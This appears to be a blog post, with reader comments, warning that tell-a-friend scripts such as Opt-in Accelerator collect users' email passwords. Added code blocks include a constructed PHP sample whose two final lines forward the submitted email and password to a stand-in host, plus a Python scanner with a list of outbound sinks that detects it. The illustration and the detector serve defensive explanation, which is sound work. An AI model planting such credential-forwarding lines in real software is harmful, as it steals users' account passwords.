Opt-in Accelerator Warning – Security Risk – Read This First!

Opt-in Accelerator is a massive security risk for your customers. Rather than fix the security problems, the new version just adds fluff without addressing the core issue: it asks people to hand over the password to their email account.

Anyone can make a mistake and release a product without considering all the possible ramifications, but to release Opt-in Accelerator again without major changes is irresponsible.

The Irresponsible Viral Tell-A-Friend Trio

So far there have been three such scripts I have written about, and there is a fourth “coming soon”:

  • My first coverage of Opt-in Accelerator
  • Then there was Viral Optin Generator which may well have been a private label or resale rights product
  • Viral Inviter is launching soon – last I saw of this script installed “out in the wild” it was a security risk
  • There is another one I know about, TrafficXplode 2.0 which also features the same security risks

Relook @ Opt-In Accelerator

[Screenshot: the Opt-in Accelerator sign-up form, with one field circled in red]

You see that big red circle I added? It marks the field that asks for the password to your email account. That one password is the key to unlocking:

  • Your email
  • Your Google AdSense account
  • Your Google AdWords account
  • Google Analytics
  • Google Website Optimizer
  • Your PayPal account
  • Affiliate program passwords
  • Your Blogger account
  • Any site that lets you reset or resend a password by email
  • Any social media profile registered with that email address
  • Did you use that address for your domain records? Wave goodbye to your domains

I am not claiming that anyone creating such a script is dishonest, or even the people who might use them, but keeping personal data secure takes a huge investment of manpower and financial muscle, and those are things most internet marketers don’t have.

All it takes is for a script kiddie to come along and compromise the script running on your server. Instead of acting as an “innocent” tell-a-friend script that boosts your email subscribers, it would then collect every login and password entered into it and forward them to an anonymous server.

Two extra lines of code would do it.
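The kind of two-line addition the paragraph above describes, and a crude check for it, as an added example that is not part of the original post and not the source of any product named here. The PHP fragment is constructed for illustration (these scripts usually ship as PHP); the scanner is a toy taint check written in Python that follows the submitted password through simple assignments and flags any outbound call it reaches. Nothing here touches the network.

```python
import re

# Constructed sample of a password-based tell-a-friend handler. It is NOT the
# source of Opt-in Accelerator or any product named in the post. The last two
# statements are the kind of "two lines of additional code" the post describes:
# the credentials are forwarded to a third-party host before the script carries
# on with its advertised job.
SAMPLE_PHP = r"""<?php
$email    = $_POST['email'];
$password = $_POST['password'];
$contacts = scrape_contacts($email, $password);   // logs in to the webmail account
foreach ($contacts as $c) { send_invite($c, $email); }
// --- the two added lines ---
$leak = 'http://collector.invalid/c.php?u=' . urlencode($email) . '&p=' . urlencode($password);
@file_get_contents($leak);
?>"""

# Request keys that mean "this variable holds a password".
CREDENTIAL_KEYS = {"password", "pass", "passwd", "pwd"}

# Calls through which data can leave the server (network, mail, shell).
OUTBOUND_SINKS = ("file_get_contents(", "curl_init(", "curl_setopt(", "fsockopen(",
                  "fopen(", "mail(", "exec(", "system(", "shell_exec(")

ASSIGN_RE = re.compile(r"^\s*@?\$(\w+)\s*=(?!=)\s*(.+)$")
INPUT_RE = re.compile(r"\$_(?:POST|GET|REQUEST)\[['\"](\w+)['\"]\]")


def _mentions(var: str, text: str) -> bool:
    """True if $var appears in text as a whole variable name."""
    return re.search(r"\$" + re.escape(var) + r"\b", text) is not None


def tainted_variables(php: str) -> set[str]:
    """Variables that carry the submitted password, directly or via assignment.

    Seeds the set with variables assigned from a password-like request key, then
    propagates through plain assignments until nothing changes. Deliberately
    crude: no call tracking, no string interpolation, no $$var or eval().
    """
    tainted: set[str] = set()
    lines = php.splitlines()
    for line in lines:                       # seed: $x = $_POST['password']
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        for key in INPUT_RE.findall(m.group(2)):
            if key.lower() in CREDENTIAL_KEYS:
                tainted.add(m.group(1))
    changed = True
    while changed:                           # propagate: $y = ... $x ...
        changed = False
        for line in lines:
            m = ASSIGN_RE.match(line)
            if m and m.group(1) not in tainted and any(_mentions(v, m.group(2)) for v in tainted):
                tainted.add(m.group(1))
                changed = True
    return tainted


def find_exfiltration(php: str) -> list[tuple[int, str]]:
    """(line number, line) for every outbound sink fed by a password-tainted variable."""
    tainted = tainted_variables(php)
    hits = []
    for n, line in enumerate(php.splitlines(), start=1):
        if any(s in line for s in OUTBOUND_SINKS) and any(_mentions(v, line) for v in tainted):
            hits.append((n, line.strip()))
    return hits


if __name__ == "__main__":
    print("password-tainted variables:", sorted(tainted_variables(SAMPLE_PHP)))
    for n, line in find_exfiltration(SAMPLE_PHP):
        print(f"line {n}: {line}")
```

On the sample this flags line 8, the `file_get_contents()` call that receives the URL built from `$password`. The check only catches the lazy case: a backdoor that obfuscates the URL, goes through `eval()`, or hides the sink behind a helper in another file walks straight past it, which is the real lesson. You cannot audit your way out of a design that puts someone else's email password on your server; the fix is to never collect it.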

We will ignore the many other potential problems: scraping the email services against their terms of service, potentially breaking the terms of the autoresponder service you use, or totally trashing your email deliverability as hundreds of people flag your messages as spam.

I think Robert Plank covered that aspect of Opt-in Accelerator quite adequately.

Solutions

Password data should never be entered in a form on a third-party site, least of all an insecure form hosted by someone without exceptional security in place. Your email provider’s own login page is the only place that password belongs.

Very Simple Mail To:

These examples are from Plurk (they also use the insecure password method, and have been accused of spam with their Facebook implementation). Each link opens a pre-filled compose window in the user’s own webmail, so the message and the recipients stay under the user’s control:


Gmail:
http://mail.google.com/mail/?view=cm&cmid=0&fs=1&su=Invitation+to+Plurk.com&body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21%0A%0AAccept+my+invitation+by+going+to%3A%0Ahttp%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2%0A%0ACheck+out+my+profile+at%3A%0Ahttp%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard%0A%0APlurk.com+-+Your+life%2C+on+the+line&tearoff=1&shva=1&ui=1

Yahoo! Mail:
http://compose.mail.yahoo.com/?Subj=Invitation+to+Plurk.com&Body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21+Accept+my+invitation+by+going+to%3A+http%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2.+Check+out+my+profile+by+going+to%3A+http%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard

Hotmail:
http://www.hotmail.msn.com/secure/start?action=compose&subject=Invitation+to+Plurk.com&body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21%0A%0AAccept+my+invitation+by+going+to%3A%0Ahttp%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2%0A%0ACheck+out+my+profile+at%3A%0Ahttp%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard%0A%0APlurk.com+-+Your+life%2C+on+the+line

This approach is wonderful because people send the invitation from their own email account: your site never sees a password, nothing is sent from your server, and it works on any hosting, even a shared account that limits how many emails you can send per hour. The trade-off is that it cannot import an address book; the user picks the recipients themselves.
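The compose-link approach as working code, added here and not part of the original post or of Plurk’s site. It rebuilds the three links above from a subject and body, decodes the Gmail one to show exactly what the user’s webmail receives, and adds an assumed HMAC-based `check` tag to the invite link so a referral can be credited to the inviter without any password changing hands. How Plurk computes its own `check` value is not on the page; the endpoint URLs are the 2008 ones quoted above, and the secret key is a constructed placeholder.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, quote_plus, urlencode, urlsplit

# Webmail compose endpoints exactly as quoted in the post. They are 2008-era
# URLs, kept only so the Plurk links can be rebuilt and checked; the providers
# have changed these addresses since.
COMPOSE_ENDPOINTS = {
    # provider: (base URL, fixed parameters, subject key, body key)
    "gmail":   ("http://mail.google.com/mail/", {"view": "cm", "cmid": "0", "fs": "1"}, "su", "body"),
    "yahoo":   ("http://compose.mail.yahoo.com/", {}, "Subj", "Body"),
    "hotmail": ("http://www.hotmail.msn.com/secure/start", {"action": "compose"}, "subject", "body"),
}

# The Gmail link from the post, verbatim, so it can be decoded below.
PLURK_GMAIL_URL = (
    "http://mail.google.com/mail/?view=cm&cmid=0&fs=1&su=Invitation+to+Plurk.com"
    "&body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21%0A%0A"
    "Accept+my+invitation+by+going+to%3A%0Ahttp%3A%2F%2Fplurk.com%2FredeemByURL"
    "%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2%0A%0ACheck+out+my+profile"
    "+at%3A%0Ahttp%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard%0A%0APlurk.com+-+Your"
    "+life%2C+on+the+line&tearoff=1&shva=1&ui=1"
)


def compose_url(provider: str, subject: str, body: str) -> str:
    """Build a pre-filled compose link for the user's own webmail."""
    base, fixed, subject_key, body_key = COMPOSE_ENDPOINTS[provider]
    params = dict(fixed)
    params[subject_key] = subject
    params[body_key] = body
    # quote_plus encodes spaces as "+" and newlines as %0A, matching the post's links.
    return base + "?" + urlencode(params, quote_via=quote_plus)


def query_params(url: str) -> dict[str, str]:
    """Decode a URL's query string into {key: first value}."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def invite_body(site: str, invite_link: str, profile_url: str, tagline: str) -> str:
    """Message body in the same shape as the Plurk invitation."""
    return (
        f"I have been using {site} and I think you should check it out!\n\n"
        f"Accept my invitation by going to:\n{invite_link}\n\n"
        f"Check out my profile at:\n{profile_url}\n\n{tagline}"
    )


# Crediting the inviter without a password: the invite link carries from_uid and
# a check tag. ASSUMED scheme (not Plurk's, which the page does not describe):
# HMAC-SHA256 over the user id under a server-side secret, so a recipient cannot
# credit a different user by editing from_uid in the link.
SECRET_KEY = b"constructed-example-secret-not-a-real-key"   # placeholder, assumption


def make_invite_link(base: str, from_uid: int, secret: bytes = SECRET_KEY) -> str:
    tag = hmac.new(secret, str(from_uid).encode(), hashlib.sha256).hexdigest()
    return base + "?" + urlencode({"from_uid": from_uid, "check": tag})


def verify_invite_link(url: str, secret: bytes = SECRET_KEY):
    """Return the referring uid as a string if the tag verifies, else None."""
    q = query_params(url)
    uid, tag = q.get("from_uid", ""), q.get("check", "")
    expected = hmac.new(secret, uid.encode(), hashlib.sha256).hexdigest()
    return uid if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    decoded = query_params(PLURK_GMAIL_URL)
    print(decoded["su"])
    print(decoded["body"])
    link = make_invite_link("http://example.invalid/redeemByURL", 15547)
    body = invite_body("Plurk", link, "http://www.plurk.com/user/andybeard",
                       "Plurk.com - Your life, on the line")
    for provider in COMPOSE_ENDPOINTS:
        print(compose_url(provider, "Invitation to Plurk.com", body))
```

Everything in the compose URL is visible to the user before anything is sent, and the site that generated it holds nothing more sensitive than its own referral secret. Note that `urlencode` also encodes the `&` and `=` inside the embedded invite link (as `%26` and `%3D`), exactly as in Plurk’s links; leaving them raw would split the body parameter at the first `&`.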

Existing APIs

Google, Yahoo! and Microsoft also have APIs for this kind of thing, which can also be used for finding friends. The user grants access on the provider’s own site, and your script receives permission to read contacts rather than the account password:

  • Google Contacts API
  • Yahoo! Contact API
  • Windows Live Contact API

I should also mention the ongoing OAuth efforts to create a unified interface for retrieving contact and other personal information with the user’s permission.

To be fair, I am going to give Jason a link to some partial counter-arguments. He seems to think it is worth the risk.

The problem with that argument is that there is no need for this to be a security risk at all. It is just lazy programming.

Comments

  1. Dave Sherwin says

    I’m glad I found your blog! Excellent information. I’m glad there are watchdogs out there in the world policing this stuff, because I tend to assume services are trustworthy.

    Thanks for the great info.

    Dave Sherwin

    • says

      We should really thank Andy for the warning! I guess we all assume too many things we find on web as trustworthy. And unfortunately that’s not how the story goes – not always, at least!

  2. Viral Inviter says

    Hey Andy… while I respect your views on these tell a friend scripts I personally think viral inviter rocks…

    In the past week I have been using it, I saw a crazy jump in traffic, so that’s good for me… But yeah, the risks are certainly there – more so on the users’ side than the person running the script.

    All the best
    J

  3. says

    Thanks for the heads-up.

    I don’t think it is a matter of trust. If people enter their information, that means they trust my site enough to let me handle the work, perhaps there should be a privacy policy.

    I may trust Facebook or MySpace, but what if the recipients don’t? Isn’t it the same problem with Optin Accelerator on my site?

    Facebook has permission but not your site, that’s the difference.

    It is more a problem of terms of service too. If the mail account providers disallow it, and also Aweber, then I want to stay on the safe side.

  4. says

    I know that I would not have known anything about the security risk had I not seen that post. I like the way you used screen shots to explain the risk. I am a visual learner.

  5. says

    This is interesting. I’d never considered the security issues involved with TAF technology.

    I’ve always used Viral Friend Generator. Perhaps you can review that one in the future if you touch on this subject again.

    Thanks for an interesting post.

    • says

      It isn’t a scam, the people creating these scripts are as far as I am concerned honest guys, and so will most of the people using them be honest.

      But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.

      Thus anyone using one of these scripts hasn’t really evaluated the risk vs reward, and their sites really are a security risk even if they have no bad intentions.

      You will of course get sites offering a free Wii every day, who are only after farming passwords. How do you tell the difference?

  6. says

    You know what they say about good intentions and the road to hell.

    Thanks for evaluating the risks and sharing that information.

    oh, by the way ACK!!! I remember David Airey’s post on how his gmail got hacked and as a result, he lost his domain name!!!
    (My post on that is the link above.)

  7. says

    Great timing for me. I had bookmarked the page from an email two days ago. The email was from a very well known marketer and he tossed in an endorsement from an even bigger-named marketer. This shouldn’t matter but I guess those of us that know nothing about programming tend to trust certain recommendations without a little research. I don’t hold the marketers at fault, I’m sure they were unaware of the potential risk. Another reminder that we shouldn’t just blindly trust a product based solely on the reputations of those that promote it. Nice post, I appreciate the way it was explained so that anyone can understand.

  8. says

    I don’t think these type of optin scripts are bad. I think they can be made secure by the owners.

    Also, can’t you sue them too if someone sues you?

    “But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.”

    I don’t really agree with that statement. Companies like Facebook and MySpace use it. Why should you trust them?

    And I don’t really think that someone has actually compromised the security of these scripts…

  9. says

    There is no call for that level of programming laziness. All this is doing is putting users in danger. Just one Cross Site Scripting Attack or an SQL injection attack would potentially unlock the entire database and even if it does not it could:

    (a) Phish the email owner to a “new site”
    (b) Capture new sign-ups and steal passwords
    (c) Spam the snot out of all the juicy addresses inside

    It is on point C that these sites become a spammer’s wet dream. As such it’s not the script kiddies you will need to look out for but the professional guys. The same guys that only need the hashed version of the password (if they store it) and some time alone with a password cracker – rainbow tables make the job of years into the work of seconds.

    I get freaked out about people wanting my twitter login data.

    Now what happens if the domain expires and some evil person takes it over?

    OUCH!

    Those APIs are there for our protection.

  10. says

    Great reminder, Andy. Actually I don’t really think it’s good doing or signing into stuff that is not secure. Those pages would surely scrape into your account. As you may have said, it isn’t illegal but it’s just not right and secure.

  11. says

    This script is a child’s toy (as evidenced by the lazy way it was coded). You want to make a site with a REAL address importer script like Myspace, Facebook, Tagged, Multiply, Mahalo etc. are using? Call your VC firm (the ones who funded the major social networking companies) and be prepared to open your wallet.

  12. says

    I cannot believe I am reading this post. Numerous times I have provided my details on such sites (not sure if they used the script), so I have exposed my details to them. The first thing I am going to do now is to change all my passwords. Thanks for bringing that to our notice. I never thought about it. From next time onwards, no fooling around. Thanks again.

  13. says

    I think it’s insane to give away your email password to some third party. Even if someone knows nothing about programming, they should understand that the password provides complete control over their email account.

    I think this approach of wondering if you can “trust” a particular person/site is also flawed. One should worry about the webmaster’s tech-savvy first. For example, I might completely trust my hypothetical grandma who’s running a knitting tips website, but I sure wouldn’t want to let her maintain a database of credit card data.

  14. says

    These sort of opt-in programs make me very nervous, several people I know of on forums have had their accounts hacked and their Paypal and email accounts have been compromised…be careful out there.

  15. says

    Hey Andy, I never looked at it that way. It seems these types of scripts are a hot topic and everyone either has one or is working on one.

    I don’t have one, I can’t say I never thought about it in passing, but having read your post, I will need to start paying more attention to the scripts and softwares being offered.

  16. says

    Thanks for writing about this. I always wondered about the security aspects of these ‘inviter’ scripts.

    Andrew

  18. says

    Far out. Andy, it seems to me that every time the less computer literate population gets a little closer to trusting the Internet (with the appropriate degree of discrimination against scams and spam, of course), someone has to go and do something stupid and it leads to yet another big moral panic and suddenly nobody wants to buy stuff of eBay. Don’t know how that works, but I do blame these fellas ;)

  19. says

    Hi Andy,
    I know one of the guys behind the Optin Accelerator, and he points out that the Password is Encrypted (Hashed Out). So theoretically the servers can read it but humans can’t.

    I don’t know enough about it to say one way or the other. But the other script you mentioned, the Viral Optin Generator, sounds interesting, and for the low price it may be worth checking out.

    Thanks!

    Steve Renner

  20. says

    You know, I’ve seen these before on other sites when I was signing up for something and it always made me curious about the safety issues. I mean, even if the site says it’s secure, how do you really know for sure? You’re giving them YOUR password! I don’t trust stuff like this so I usually just “skip” it.

    Another thing I’ve always worried about is those automatic scanners. I’m sure everyone has run into one at one point or another. You’re on a webpage minding your own business and a second later a popup says it’s scanning your computer. And it really is, because I can see MY files being scanned, each by name. How do people get away with this crap?!?

  21. says

    Wow. You’d think people would choose a little more carefully before releasing something.

    How damaging is this to their reputation? Hope they made enough to pay for lawyers.

    Thanks for the heads up!

  22. says

    Great post! The information you have provided here was so educating as well as enlightening. I am sure many people need to know about this for their protection.

  23. says

    This is truly a disturbing post.

    However, I remain grateful that I took the time to read and become informed.

    This information is very practical and good to know. Thanks for providing the information.

  24. says

    Yes, I have found some social networking sites that ask for your password to get through to your email and get contacts. I usually don’t input my password since there might be some sniffing dogs who want to get my password and use it to open my account.

    Thank you and i hope we could build a community of watchdogs against these sites.

    Charles
    Money Making and Blogging Tips
    http://www.resourcesandmoney.blogspot.com

  25. says

    The thing that I am worried about is that they may be violating certain Terms of Service contracts. Most email providers forbid members to share their login information with any third party entity, and the so-called “Opt In Accelerator scam” does just that. Fortunately, very few email providers actually enforce their TOS to that point, in fact, have you seen Multiply or Facebook get into trouble with a major email service provider?

  26. says

    Thanks for the heads up!

    I was literally on this site yesterday then found your blog post today.

    Thanks again for the warning.

  27. says

    Dear,
    You remember the issue with Gmail Archiver? It also had similar issues, like Opt-in Accelerator! I think there are people still using Gmail Archiver! (psst… I got that free with a computer magazine)

  28. says

    Thanks for the heads-up Andy. I was considering using it to increase traffic but now I realize I have to weigh the risks vs. the benefits.

  29. says

    The best way to keep your paypal safe is use a separate email just for paypal and nothing else.

    Also sorts all those spam mails about paypal problems too.

    The other problem with these invite scripts is that people (like me) see them as spam. OK they have my mates name on them but they’re nothing less than a spammy sell sell sell message and make me disinclined to join a site that sends them.

  30. says

    This is a very informative (and disturbing) post. I’ve heard of AdWords accounts being hacked/phished and the damage can be extraordinary. You’ve got to consider not only your account being used to rack up a huge AdWords bill but also all of your campaign data being stolen and the loss of income when your main traffic source dies.

    It is an awful lot riding on one password:(

  31. says

    This is a great post. Personally I do not optin any place if I think the information I receive is really required. With all the hackers and programs in cyberspace, everyone should be very careful before giving out any personal information that opens door for disaster.

  32. says

    Very excellent information. I never knew that there could be potential risks with certain programs. I am surprised there wasn’t more from this.

  33. says

    That’s a very exhaustive and informative review of optins. I think people should think twice before giving away some information. This can be a spam bait for some!

  35. says

    I had a good read; thanks for the information and insights you have provided here. I will certainly bookmark your blog for future reads. Thanks!

  36. says

    Andy, what was the follow-up to this story? Did you contact these guys and inform them of the security flaws you found? What was their reaction?

  37. says

    Thanks for the heads up Andy.
    Lord Matt – that’s the first thing I thought of as a security concern, “SQL Injection Attacks”. Once someone has grabbed that huge database, who knows what will happen next. In our virtual office and serviced offices we’re very conscious of security with clients’ personal information; it’s about time others followed suit.

  38. says

    Nice article, Andy, as I hadn’t even thought about the fact that we can control all the email, PayPal and even Blogger accounts under one roof…

    Thanks for the great post :)

  39. says

    Hi Andy,

    Thanks for the post! I had no idea that entering your password into a form like this could make it possible for someone to unlock everything from your Gmail account to all you domain names.

    It sounds like we should all be using security certificates on all our membership sites.

    All the best!

  40. says

    This is a great article (post, whatever :) ). I’ve never trusted TAF or any other application which asks me to provide my password for a 3rd party service. Don’t even talk about sending that over an unsecure connection.

    Last year I installed a TAF form on one of my sites (coded by myself) and had to shut it down less than a week later due to member abuse. Now I’m using a “mailto” link which just triggers users e-mail client.

  41. says

    Thanks, Andy, for such a nice post. Although I am not a user and might never have used the program, it is good to see that guys like you are watching our interests. They are doing our dirty work for us, so to speak, so that we won’t get into any trouble.

    Plus like the screen shots. I guess they are now more vital to be part of the posts

    Cheers / Jessica

  42. says

    Shoot, I wish I would have found this out yesterday.

    I just used this script or a similar one.
    BUT I changed my Gmail password before and right after.
    But the script was flawed and didn’t show me all my 2000+ addresses, to uncheck the ones I didn’t want to send to, so I ended up spamming a TON of people.
    And got 700 bounce-backs or “Mail delivery failed”, as the address book is a bit outdated; my Gmail address was blocked & the server was blacklisted…

    Boy, what a mess.
    I am so glad I didn’t use my domain to send emails from, that could have been a disaster.

  43. says

    Hi.

    This is a good, insightful take on a very important issue.
    While I am trying to understand the issues regarding privacy in the internet space, Facebook and similar sites are using these details for their purposes, so why not others, if they show a terms of use agreement?

    Thanks

  45. says

    It’s incredible how easily people give away this information without thinking at all. I have a secondary mail address that I use on all unsafe sites.

    Thanks for the great post!

  46. says

    This is a constant reminder that you need to be careful. Lately I have been getting a lot of spam email and I just ignore it. You also need to do what you can to make sure your server and site is secure.
